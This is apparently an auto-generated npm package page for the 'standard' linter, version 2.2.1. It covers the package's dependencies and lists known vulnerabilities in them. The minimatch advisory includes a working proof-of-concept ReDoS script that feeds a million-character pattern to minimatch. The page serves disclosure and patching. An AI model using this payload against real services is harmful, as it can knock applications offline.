Standard version 2.2.1 is a patch release of the popular JavaScript Standard Style package, building upon the prior stable version 2.2.0. Both versions offer a consistent and opinionated code style, automatically formatting JavaScript code to adhere to a set of predefined rules. This promotes code readability and maintainability across projects, eliminating debates about style conventions. Critically, the core dependencies like glob, jscs, split, eslint, jshint, minimist, find-root, minimatch, and run-parallel, which are responsible for linting, file system operations, and parallel execution remain identical, ensuring consistent core functionality. The development dependencies like mkdirp, rimraf, extend.js and run-series, utilities used in the development and testing of the package, are also unchanged.
The primary distinction between 2.2.0 and 2.2.1 lies in its release date and associated bug fixes or minor improvements. Version 2.2.1 was released shortly after 2.2.0, suggesting it resolves immediate issues discovered in the previous release. While the provided data doesn't explicitly detail the nature of these fixes, developers should consider upgrading to 2.2.1 for enhanced stability and potential resolution of reported bugs. The presence of the dist.tarball property in each version allows easy retrieval of the package from the npm registry. Both versions are licensed under the MIT license, are available in github and created by Feross Aboukhadijeh.
All the vulnerabilities related to the version 2.2.1 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.